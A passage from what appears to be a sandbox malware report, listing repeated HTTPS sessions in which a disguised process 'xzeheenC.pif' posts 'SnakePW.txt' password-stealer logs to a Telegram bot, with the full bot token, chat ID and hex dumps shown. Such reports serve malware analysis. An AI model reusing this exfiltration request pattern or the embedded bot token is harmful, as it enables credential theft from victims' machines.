                                                                                                        2024-12-18 15:31:38 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419104,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535898,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        44192.168.2.849757149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:37 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20cec9e96ae0
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:37 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 63 65 63 39 65 39 36 61 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20cec9e96ae0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:38 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:38 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:38 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419106,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535898,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        45192.168.2.849758149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:39 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20718558b20c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:39 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 37 31 38 35 35 38 62 32 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20718558b20cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:39 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:39 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:39 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419108,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535899,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        46192.168.2.849759149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:39 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd201d8285f219
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:39 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 31 64 38 32 38 35 66 32 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd201d8285f219Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:40 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:40 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:40 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419110,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535900,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        47192.168.2.849760149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:40 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20e3c6ae2bb6
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:40 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 65 33 63 36 61 65 32 62 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20e3c6ae2bb6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:40 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:40 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:40 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419112,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535900,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        48192.168.2.849761149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:41 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20859c831fbc
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:41 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 38 35 39 63 38 33 31 66 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20859c831fbcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:41 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:41 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:41 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419114,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535901,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        49192.168.2.849763149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:41 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd202f16a5978c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:41 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 32 66 31 36 61 35 39 37 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd202f16a5978cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:42 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:42 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:42 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 30 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419116,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535902,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        50192.168.2.849764149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:42 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20f8ada3c59e
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:42 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 66 38 61 64 61 33 63 35 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20f8ada3c59eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:42 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:42 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
